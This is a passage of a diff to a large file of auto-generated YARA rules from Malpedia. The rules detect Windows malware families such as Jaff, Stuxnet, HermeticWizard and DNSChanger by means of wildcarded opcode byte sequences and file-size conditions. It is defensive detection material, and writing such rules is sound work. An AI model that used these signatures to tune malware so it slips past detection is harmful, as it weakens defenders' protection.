8b4dfc 51 ff15???????? } - $sequence_4 = { 8b4d08 51 ff15???????? 83c404 8945f0 } - $sequence_5 = { 8b4508 50 6804010000 8d8d78f7ffff 51 e8???????? } - $sequence_6 = { ff15???????? 8945fc 837dfc00 7479 837dfcff } - $sequence_7 = { 7420 8b0d???????? 51 8b15???????? 52 } - $sequence_8 = { 83c005 99 b905000000 f7f9 } - $sequence_9 = { 6bc005 83e803 99 b999000000 } - $sequence_10 = { 69c0b13a0200 99 83e203 03c2 } - $sequence_11 = { e8???????? 833d????????00 7509 833d????????00 740b } - $sequence_12 = { eb0c c705????????b80b0000 eb0a c705????????e8030000 } - $sequence_13 = { 83e101 f7d9 81e12083b8ed 33c1 } - $sequence_14 = { 483d00080000 7323 4863442450 488b4c2468 0fb609 888c04e0030000 } - $sequence_15 = { 83e203 03c2 c1f802 89442410 8b4c240c } + $sequence_0 = { 85db 7435 85f6 7431 } + $sequence_1 = { c744241410000000 c744241000000000 c744240c00000000 c744240800000000 c744240400000000 } + $sequence_2 = { 8b6c243c 3d???????? 741d 896c243c } + $sequence_3 = { a1???????? 8b5c2430 8b742434 8b7c2438 8b6c243c 3d???????? } + $sequence_4 = { 8b7c2438 8b6c243c 85db 7435 } + $sequence_5 = { 7431 896c240c 897c2408 895c2404 893424 } + $sequence_6 = { 8b6c243c 85db 7435 85f6 } + $sequence_7 = { 8b7c2438 8b6c243c 3d???????? 741d 896c243c } + $sequence_8 = { 893424 e8???????? 85c0 7831 } + $sequence_9 = { 7431 896c240c 897c2408 895c2404 } condition: - 7 of them and filesize <1032192 + 7 of them and filesize <2657280 } -rule MALPEDIA_Win_Jaff_Auto : FILE +rule MALPEDIA_Win_Darkme_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "05c08a02-2b7b-5977-8a51-2a2090077d3b" + id = "08b1ecd8-4245-5b36-9b97-82dc7b781460" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jaff_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkme_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "af5ef67353fca994a67e82aadde11782d5e684720bb76ef0f2df38c565071742" + logic_hash = "8ec0d0c962cec5e0ecd8c6f133e096757eb87617c4861f80c1b1cf3c91f3cada" score = 75 quality = 75 tags = "FILE" @@ -181999,32 +184700,32 @@ rule MALPEDIA_Win_Jaff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c746080a000000 c6460c01 ffd7 8b1d???????? 50 ffd3 6a14 } - $sequence_1 = { 8bf8 e8???????? 8b4704 48 7818 } - $sequence_2 = { 8b4514 8b4d10 6a00 8d55fc 52 50 51 } - $sequence_3 = { 72ed 8b45dc 50 6a00 ffd7 50 } - $sequence_4 = { ffd3 8945f0 8b450c 8d5de0 8d4df0 e8???????? 8b45e0 } - $sequence_5 = { 3b4510 0f82a5feffff 8b4d14 51 6a00 } - $sequence_6 = { 8d5598 52 8d45cc 50 e8???????? 8d7da8 } - $sequence_7 = { 33c2 2bc2 50 8d95f8fbffff 68???????? } - $sequence_8 = { 8d4584 e8???????? 8d7da4 8d75e4 e8???????? 8b55a4 8b3d???????? } - $sequence_9 = { c745f00a000000 c645f401 ffd3 50 ff15???????? 8945e8 } + $sequence_0 = { 8dbddcfcffff f3ab b964000000 8dbd18fbffff 68???????? 8985d8fcffff 8985d4fcffff } + $sequence_1 = { 51 8d55d4 52 6a02 ff15???????? 83c40c 8d45c4 } + $sequence_2 = { 8b8518ffffff 8b08 8b9518ffffff 52 ff5114 dbe2 } + $sequence_3 = { 6a00 ff15???????? 50 8b558c 81c2???????? 52 ff15???????? } + $sequence_4 = { c745880a000000 8b8530ffffff 50 ff15???????? 8945a0 c7459808000000 8b4dd4 } + $sequence_5 = { 8b8500ffffff 50 8b8dfcfeffff 51 ff15???????? 898594feffff eb0a } + $sequence_6 = { 05???????? 898588feffff eb12 8b8db4feffff 81c1???????? 898d88feffff 8b9588feffff } + $sequence_7 = { 83c42c 51 68???????? ff15???????? 85c0 0f851afeffff } + $sequence_8 = { 8b5144 52 8d8524ffffff 50 8d8d54ffffff 51 ff15???????? } + $sequence_9 = { 8b08 8b95fcfeffff 52 ff5120 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <1515520 } -rule MALPEDIA_Win_Faketc_Auto : FILE +rule MALPEDIA_Win_Taintedscribe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "17b42993-c08e-510a-afaa-62243000eea0" + id = "62c390fd-70d7-5d2c-ab35-2685bb241f72" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.faketc_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taintedscribe_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "d424513e0804264658899ed0249bf1311c7683556fe66475d3d53a03a7ef5219" + logic_hash = "9db61e016991abab1a5db24c238ca36eb7d715a36997cda629b6ade68b20e5c3" score = 75 quality = 75 tags = "FILE" @@ -182038,32 +184739,32 @@ rule MALPEDIA_Win_Faketc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? c684248001000002 8b442448 8b5004 8bce ffd2 84c0 } - $sequence_1 = { e8???????? 83c410 6a5e 8d8576f7ffff 50 6a00 6a00 } - $sequence_2 = { 899158010000 8b4508 8b484c 8b55f8 668b4104 66894248 8b4df8 } - $sequence_3 = { e8???????? 83c410 6a00 8b4d8c 51 6a01 8b5508 } - $sequence_4 = { ffd6 50 b86f000000 e8???????? 83c404 a3???????? eb06 } - $sequence_5 = { e9???????? 8d45d8 50 e8???????? c3 8d8548ffffff 50 } - $sequence_6 = { c1fa04 8bc2 c1e81f 03c2 895c2410 0f842b010000 895c241c } - $sequence_7 = { e8???????? 8b85b0fdffff 8b0d???????? 8d95b8fdffff 52 68???????? 50 } - $sequence_8 = { e8???????? b917000000 8bf0 bf???????? f3a5 66a5 c745fc02000000 } - $sequence_9 = { c745fc???????? c745f805000000 eb0e c745fc???????? c745f806000000 8b4d08 8b91fc030000 } + $sequence_0 = { 8bc8 8b858cf7ffff 83e103 6a02 f3a4 6a00 } + $sequence_1 = { 8d4ddc 898db8fcffff 8bcf 0facd108 } + $sequence_2 = { 8b5358 898d88fbffff 8b4b50 0f94c0 } + $sequence_3 = { 85c0 7405 8b4d98 8908 85db } + $sequence_4 = { 894e3c 894e44 895648 33c0 5e 8b4dfc 33cd } + $sequence_5 = { 8b4dcc 894308 8b45d0 50 } + $sequence_6 = { 42 83fa1c 7cbb 81ff00010000 0f94c1 0fb6c1 68???????? } + $sequence_7 = { c68577fbffff01 7507 c68577fbffff00 c78570fbffff08000000 } + $sequence_8 = { 83c40c 098658af0100 8d0419 89865caf0100 83f810 } + $sequence_9 = { bb01000000 d3e3 33c0 85db 7e1e 8d4900 } condition: - 7 of them and filesize <6864896 + 7 of them and filesize <524288 } -rule MALPEDIA_Win_Mozart_Auto : FILE +rule MALPEDIA_Win_Xdspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1438b6f5-0fc9-5eca-9ae3-36eb59239394" + id = "770ce833-e4ad-5e91-a2e8-e19a8fcb8719" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mozart_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xdspy_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "94b0456ee335dcdb1592bd3a0f2b861e74a91bd5433e8fc753965fb9891ac5e3" + logic_hash = "f9c3ada66244c45df3d3dc2c6a2b3ef1f7e34e7bdca43fe98eeac2240819a0e8" score = 75 quality = 75 tags = "FILE" @@ -182077,32 +184778,38 @@ rule MALPEDIA_Win_Mozart_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7c26 80fb39 7f21 885c3418 46 } - $sequence_1 = { 66ab e8???????? 8d44242c 50 e8???????? 8d8c2430010000 51 } - $sequence_2 = { c1f805 8d1c85c0db4000 8b03 8bf1 83e61f c1e603 8a443004 } - $sequence_3 = { 49 7438 49 7471 c1e006 0bc7 } - $sequence_4 = { 55 8bec 83e4f8 81ec20020000 a1???????? 8b0d???????? 668b15???????? } - $sequence_5 = { 8bf0 83e61f 8d3c8dc0db4000 8b0f c1e603 f644310401 7455 } - $sequence_6 = { 8a08 40 84c9 75f9 8b8c2420100000 } - $sequence_7 = { 2bc7 3bf0 7202 33f6 8bc5 43 42 } - $sequence_8 = { 8b0a 83c502 3be9 7728 } - $sequence_9 = { 751a 84c0 7426 8b5608 47 } + $sequence_0 = { 8d45ec 50 ff35???????? e8???????? 83f8ff } + $sequence_1 = { ffb56cd8ffff 8d8570d8ffff 6800040000 6a01 50 e8???????? } + $sequence_2 = { 8b36 8bce c1f905 8b0c8d804e4100 } + $sequence_3 = { ff7580 8b3d???????? ffd7 8d4580 50 68???????? 56 } + $sequence_4 = { 8d45e0 50 57 8d85e02a0000 50 ff75dc ffd3 } + $sequence_5 = { 83c414 83c8ff e9???????? 8bc6 c1f805 57 8d3c85804e4100 } + $sequence_6 = { 8b4de0 8d0c8d804e4100 8901 8305????????20 } + $sequence_7 = { 8d8510ecffff 57 50 e8???????? ffb56cd8ffff } + $sequence_8 = { 0f1f4000 660f1f840000000000 420fb68431309b1700 88840db0080000 488d4901 } + $sequence_9 = { 488b15???????? 488d8da0080000 ffd0 660f6f0d???????? 488d3550331700 } + $sequence_10 = { c705????????67736666 c705????????6e747764 c705????????73752f65 66c705????????6d6d 488d1563121700 } + $sequence_11 = { 488d4901 84c0 75e8 80bd400c000000 488d85400c0000 7413 } + $sequence_12 = { 4883f860 7ccf 488d15f85c1700 488d0d41e60100 4c8d0552e60100 } + $sequence_13 = { fe08 488d4001 803800 75f5 488d8db0080000 ff15???????? } + $sequence_14 = { 83f9ff 0f8496010000 ba01000000 448d420f } + $sequence_15 = { 33c9 ff15???????? 48898424a8000000 660f6f05???????? } condition: - 7 of them and filesize <114688 + 7 of them and filesize <3244032 } -rule MALPEDIA_Win_Ramdo_Auto : FILE +rule MALPEDIA_Win_Bangat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5b8e6fef-0e3b-5ed2-888f-7434293b69d6" + id = "a2d4fb7c-d848-52ac-b553-710b64461faf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ramdo_auto.yar#L1-L104" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bangat_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "915394834672872c9dd5e507ba31a9e70d058b5fc9e0d5522912234c2f6ee339" + logic_hash = "795b6baa10d3ea1f31877796bf7d8c3236899cd7fc3cddcf5f5e7734a685bf62" score = 75 quality = 75 tags = "FILE" @@ -182116,32 +184823,32 @@ rule MALPEDIA_Win_Ramdo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6813299e13 6a00 6a00 e8???????? } - $sequence_1 = { ff55f8 8945fc 837dfcff 7411 } - $sequence_2 = { 688fe57c18 6a03 6a00 e8???????? } - $sequence_3 = { 681186933f 6a03 6a00 e8???????? } - $sequence_4 = { 68b20cdc96 6a03 6a00 e8???????? } - $sequence_5 = { 6a00 6a00 ff95dcfeffff 8945fc } - $sequence_6 = { e8???????? 3db7000000 7405 8b45fc } - $sequence_7 = { 681b313f7d 6a03 6a00 e8???????? } - $sequence_8 = { 68e9b528b6 6a03 6a00 e8???????? } - $sequence_9 = { 68c29e34ea 6a03 6a00 e8???????? } + $sequence_0 = { 6a01 6800000040 50 e8???????? 83c43c 8bf0 83feff } + $sequence_1 = { 13f9 03f0 13fd 8b6c2434 89742418 03de 8b74245c } + $sequence_2 = { 8b442424 99 f7fe 83c408 85d2 7425 6815050000 } + $sequence_3 = { ff750c 50 ff15???????? 8bf0 ff15???????? 83f850 } + $sequence_4 = { 8b4c2474 0bc8 8b442464 0bc2 8b54244c 33f1 33f8 } + $sequence_5 = { 83cbff eb11 83fb01 750c 8b5004 85d2 7505 } + $sequence_6 = { 8b5704 8b0e 8b3a 8bc1 2bc7 7511 8b7a08 } + $sequence_7 = { 8b35???????? 8d45e8 68???????? 50 ffd6 8bf8 59 } + $sequence_8 = { 8b4b58 898184030000 8b03 3d00030000 0f8ebf000000 8b442418 8b4c2414 } + $sequence_9 = { 75f3 5f 5e 5d b830000000 } condition: - 7 of them and filesize <548864 + 7 of them and filesize <1228800 } -rule MALPEDIA_Win_Stuxnet_Auto : FILE +rule MALPEDIA_Win_Unidentified_091_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e84f453f-688f-5279-9168-a0cb915408b7" + id = "8c2d9d9b-cb98-5dfc-90ce-01312105d94f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stuxnet_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_091" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_091_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "9f5d56947917572e8a9b84c0e49b11ae5a34a590900f3243fcc05249be23cf0d" + logic_hash = "5f25d4d54583311a39cbead5d516e9dd7eb57b96b31eb59a9b18d068eb7148c5" score = 75 quality = 75 tags = "FILE" @@ -182155,32 +184862,32 @@ rule MALPEDIA_Win_Stuxnet_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8b5dec 8b45f0 895df4 8945f8 ff770c 8d75ec } - $sequence_1 = { c20400 b8???????? e8???????? 51 6a08 e8???????? 59 } - $sequence_2 = { e8???????? 33db 895dfc 53 8d45d8 50 6802000080 } - $sequence_3 = { 6aff 68???????? 64a100000000 50 64892500000000 83ec64 8d442420 } - $sequence_4 = { eb02 33f6 c645fc00 8b4f1c 3bf1 740a 85c9 } - $sequence_5 = { 837df008 8b45dc 7303 8d45dc 50 8d431c e8???????? } - $sequence_6 = { c706???????? e8???????? c645fc01 c6462400 834dfcff 8b4df4 8bc6 } - $sequence_7 = { a5 50 a5 ff5130 85c0 7cb0 8b9b48080000 } - $sequence_8 = { ff750c ff7510 8d45e4 50 e8???????? c645fc01 8d4def } - $sequence_9 = { ff7508 8d4df4 e8???????? 837d14ff 7d04 33c0 eb12 } + $sequence_0 = { e8???????? c744244801000000 488d4c2460 48895c2440 4c8d8734030000 48894c2438 4c8d0ddf721400 } + $sequence_1 = { e8???????? 482be0 8b3a 488bd9 8b89d4050000 488bf2 85c9 } + $sequence_2 = { e9???????? 488d8ab00e0000 e9???????? 488d8ad00e0000 e9???????? 488d8af00e0000 e9???????? } + $sequence_3 = { 89742420 498b06 48634804 33d2 4a89543128 eb41 488b01 } + $sequence_4 = { eb6f 4c8b5048 4d85d2 7514 c74424207a020000 418d527c 41b884000000 } + $sequence_5 = { 742e c7814007000000000000 488d15b7081400 488b8938060000 41b895030000 e8???????? 48c7833806000000000000 } + $sequence_6 = { eb0f 488bd3 488d0dabf12500 e8???????? 488b85d0010000 48634804 488d0524fe2500 } + $sequence_7 = { e8???????? 90 488bcb e8???????? 85c0 7525 488b4c2438 } + $sequence_8 = { ffc3 e8???????? 3bd8 7cc6 41f6c708 0f85d0000000 4c8d058d0c1100 } + $sequence_9 = { eb03 890c90 8b4df3 48ffc2 4983c002 483bd1 72db } condition: - 7 of them and filesize <2495488 + 7 of them and filesize <5777408 } -rule MALPEDIA_Win_Hermeticwizard_Auto : FILE +rule MALPEDIA_Win_Cherry_Picker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "726bd88f-010b-5502-8637-f9d7bbeebd06" + id = "4ae5e79a-a840-5921-89d9-37d4576478a8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermeticwizard_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cherry_picker_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "42607a1b485bdd595d314b574245aeda955efc5b6dd3f18356065a03173a4530" + logic_hash = "34271a3488eb7c13dc528b66980352e939907040bf405db0ad386d2bee3e0b44" score = 75 quality = 75 tags = "FILE" @@ -182194,32 +184901,32 @@ rule MALPEDIA_Win_Hermeticwizard_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4608 3b4208 eb31 83f803 7531 8d4a04 8d4604 } - $sequence_1 = { 33c9 66897dca 6800080000 50 } - $sequence_2 = { 8b35???????? ffd6 ff75e8 ffd6 5e 8b4508 5f } - $sequence_3 = { 6bc930 53 8b5d10 8b0485c0dd0110 56 } - $sequence_4 = { 6689854cffffff 6689854effffff 66898554ffffff 6689855effffff 66898d58ffffff 66898d5affffff 59 } - $sequence_5 = { 8d4608 50 8d4908 e8???????? } - $sequence_6 = { 6a02 58 668945e8 8b4104 } - $sequence_7 = { c3 837d08ff 0f8401070000 e9???????? e9???????? 55 8bec } - $sequence_8 = { ff15???????? 83f87a 7567 ff75fc 6a08 ff15???????? 50 } - $sequence_9 = { ff15???????? 85c0 7504 b001 eb3a 57 56 } + $sequence_0 = { 68???????? 68???????? a3???????? ffd6 69c0e8030000 68???????? } + $sequence_1 = { 80fa3b 7503 83c9ff 8817 47 } + $sequence_2 = { 68???????? 56 89442420 ffd3 68???????? 56 } + $sequence_3 = { 8bf0 0fbec9 81e6ff000000 33f1 } + $sequence_4 = { a1???????? 53 8b1d???????? 56 57 6aff } + $sequence_5 = { a3???????? 85c0 7512 68???????? 50 50 } + $sequence_6 = { ff15???????? 8bf0 68???????? 56 ffd3 68???????? 56 } + $sequence_7 = { 6800010000 68???????? 68???????? 68???????? 68???????? ffd6 68???????? } + $sequence_8 = { a1???????? 56 6aff 50 8bf1 } + $sequence_9 = { ffd6 68???????? 6800010000 68???????? } condition: - 7 of them and filesize <263168 + 7 of them and filesize <712704 } -rule MALPEDIA_Win_Excalibur_Auto : FILE +rule MALPEDIA_Win_Dexbia_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2f6333bc-c895-5bb8-bab8-691e82e18cbb" + id = "2a243938-7809-594c-bcba-7fd4f6425c32" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.excalibur_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dexbia_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "2c11504edbec5bcce0250be14d19518961ccd4df7434fa2cf5c1fc07833012b8" + logic_hash = "13aa7ee33f2f2a26f0806c6fd2186fbe2a0332c45fef215a0c0786ff94a8b62c" score = 75 quality = 75 tags = "FILE" @@ -182233,32 +184940,32 @@ rule MALPEDIA_Win_Excalibur_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 c745fc00000000 e8???????? c645fc01 8bbdece5ffff 8b9dd8e5ffff 8d8dd8e5ffff } - $sequence_1 = { 884c241f b90f000000 c644242000 0f57c0 660fd6442420 8d442420 83f910 } - $sequence_2 = { 50 e8???????? 8b55e4 83c40c 6bd230 8d8210074400 8945e4 } - $sequence_3 = { 7514 8b4738 8b4f3c 8902 8b471c 8908 8b472c } - $sequence_4 = { 99 2bc2 8b5508 d1f8 2b14c5605f4300 7413 85d2 } - $sequence_5 = { 80b86004440000 74e9 8b5ddc 0fb606 0fbe8060044400 85c0 7510 } - $sequence_6 = { 6689141e 8945f8 46 03f6 0fb7141e 81ff00000001 7314 } - $sequence_7 = { c645fc01 8bbdece5ffff 8b9dd8e5ffff 8d8dd8e5ffff 83ff10 0f43cb 6a00 } - $sequence_8 = { 8bb540e5ffff e9???????? 8bb540e5ffff e9???????? 8b8530e5ffff 8b0485c0324400 f644060480 } - $sequence_9 = { 8975fc 8b45e0 8b0485c0324400 f644030401 7428 57 e8???????? } + $sequence_0 = { 8bfd b908000000 be???????? 83c520 83c320 } + $sequence_1 = { a3???????? e8???????? 8db6ec894000 bf???????? } + $sequence_2 = { ff15???????? 85c0 740c 8b442414 85c0 742a } + $sequence_3 = { 5b 81c4e81b0000 c20400 57 ff15???????? b97f000000 33c0 } + $sequence_4 = { f3a5 8bcb 8d442410 83e103 50 f3a4 68???????? } + $sequence_5 = { 5e 5d 33c0 5b 81c408100000 c3 68???????? } + $sequence_6 = { 50 ffd5 a1???????? 85c0 0f841dffffff e8???????? 5f } + $sequence_7 = { 80e920 ebe0 80a0a09e400000 40 } + $sequence_8 = { 81c408100000 c3 ff15???????? 6a00 ff15???????? 5f 5e } + $sequence_9 = { 83c404 8bf0 33c0 89442414 8944241c } condition: - 7 of them and filesize <1253376 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Findpos_Auto : FILE +rule MALPEDIA_Win_Dnschanger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "06e6ab2e-1688-507b-a649-5420f969f64c" + id = "ae807a62-5d4f-55b1-a240-1c49a1caed44" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.findpos_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dnschanger_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "89f2603a026fe078dffd243a5f02eea72ee3cfa2b2eca87062e133a5a2b51b38" + logic_hash = "6d81d999d3cf2fb8d24f1a3cbe10fc2c3244404cd2fbc45cfa8a36930b442d5e" score = 75 quality = 75 tags = "FILE" @@ -182272,32 +184979,32 @@ rule MALPEDIA_Win_Findpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48 0f844b050000 33c0 8d8c24f0010000 50 51 8d8c243c020000 } - $sequence_1 = { 68???????? e8???????? a1???????? 59 59 83c010 a3???????? } - $sequence_2 = { 7671 8365d400 8d55d4 8bcf } - $sequence_3 = { 8bcf e8???????? 8325????????00 833d????????10 68???????? 0f4335???????? } - $sequence_4 = { 8b0cb8 03cb e8???????? 85c0 7414 8b4df0 } - $sequence_5 = { eb29 8a01 3c33 7505 } - $sequence_6 = { 8945f8 8d45f8 50 c745ec00200000 ff15???????? 85c0 745f } - $sequence_7 = { 3b08 7518 53 51 51 6a01 8d45e4 } - $sequence_8 = { 50 0fb6c1 50 8d85e8e7ffff 50 } - $sequence_9 = { 33f6 46 3bc6 0f8577040000 6a11 ffd7 663bc6 } + $sequence_0 = { ff15???????? 8bf0 8b442414 6800010000 } + $sequence_1 = { b301 57 ff15???????? 85f6 740c 56 6a00 } + $sequence_2 = { 8bc2 03c7 eb02 8bc7 5f } + $sequence_3 = { be04000000 5f 8bc6 5e 81c494000000 } + $sequence_4 = { ff7508 66ab aa ff15???????? } + $sequence_5 = { 8b542408 53 8a1a 8819 41 42 84db } + $sequence_6 = { 3b0e 72f2 57 57 57 } + $sequence_7 = { 57 57 56 57 ff75fc ff15???????? } + $sequence_8 = { 5e 81c494000000 c3 83f806 } + $sequence_9 = { f3aa 8bc6 5f 5e c3 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Xiaoba_Auto : FILE +rule MALPEDIA_Win_Skinnyboy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9683766b-1f7a-5c2a-bffb-7de9b80367d1" + id = "c1dca40b-594e-536c-99f6-c4dd1e2fe372" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xiaoba_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skinnyboy_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "52112f4a96abd368fbd89cb5e047b8d530704099fd198766e1597b7a0bbb2ccf" + logic_hash = "70d89835d7c3795dc1cc1ad5fe812e10b23259f8f17b962d2f0a6c8239d19e5a" score = 75 quality = 75 tags = "FILE" @@ -182311,32 +185018,32 @@ rule MALPEDIA_Win_Xiaoba_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 58 8945ec e9???????? 8b5dfc 83c320 895dd0 6801030080 } - $sequence_1 = { b801000000 c20c00 8b9024010000 8b44240c 8910 b801000000 c20c00 } - $sequence_2 = { 8b5c243c 8b7c2464 8b542428 8b442430 03c3 42 89442430 } - $sequence_3 = { dc442410 dd5c2410 e9???????? db8740010000 dc6c2418 dd5c2418 e9???????? } - $sequence_4 = { 8b8894010000 33d2 85c9 0f95c2 8bc2 c20800 8b90b4010000 } - $sequence_5 = { 8d54b500 8b3c02 8d44f500 83c704 57 50 e8???????? } - $sequence_6 = { 85c9 7519 8b54240c 33c9 890a 8b8820010000 894a04 } - $sequence_7 = { 85c0 be???????? 7505 be???????? e8???????? 8b4008 56 } - $sequence_8 = { 8b10 52 e8???????? 83c404 8b4c2474 8901 8d4c2414 } - $sequence_9 = { 8903 8965e8 6800000000 6800000000 6800000000 ff75f0 6800000000 } + $sequence_0 = { 6a03 6a00 6a00 68bb010000 ffb5ccfeffff 56 ff15???????? } + $sequence_1 = { ff30 8945f0 ff36 8975f4 } + $sequence_2 = { 660fd68564feffff f30f7e05???????? 8d8576feffff 6a00 50 660fd6856cfeffff e8???????? } + $sequence_3 = { ffd7 ffd3 6a00 6a00 } + $sequence_4 = { c7856cffffff464b1153 c78570ffffff05170610 c78574ffffff035d591e c78578ffffff01591244 } + $sequence_5 = { c1fb05 8bfe 83e71f c1e706 8b049d10110110 } + $sequence_6 = { ff15???????? 8bf0 89b5d8feffff ffd3 } + $sequence_7 = { c745bc79000000 660fd645c0 660fd645c8 c745e457000000 660fd645e8 660fd645f0 } + $sequence_8 = { 85d2 740f 668b444de4 6631444dd0 41 3bca } + $sequence_9 = { 8d45f4 50 ff7308 ff15???????? 8b15???????? 85c0 } condition: - 7 of them and filesize <5177344 + 7 of them and filesize <176128 } -rule MALPEDIA_Win_Sys10_Auto : FILE +rule MALPEDIA_Win_Boaxxe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "01030a4d-1840-51b2-a9d0-6bbc4385fa1e" + id = "d2861d72-2434-5a6e-bbf4-9290c68bd235" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sys10_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.boaxxe_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "6943a43537b8ee069df094c74ea397f99150d4b78d4cfd8ed6ddb44f86656e07" + logic_hash = "232a66e4610caa68487a07fb0b6c51bc622cacc6954ed1eec17df693514e555a" score = 75 quality = 75 tags = "FILE" @@ -182350,32 +185057,32 @@ rule 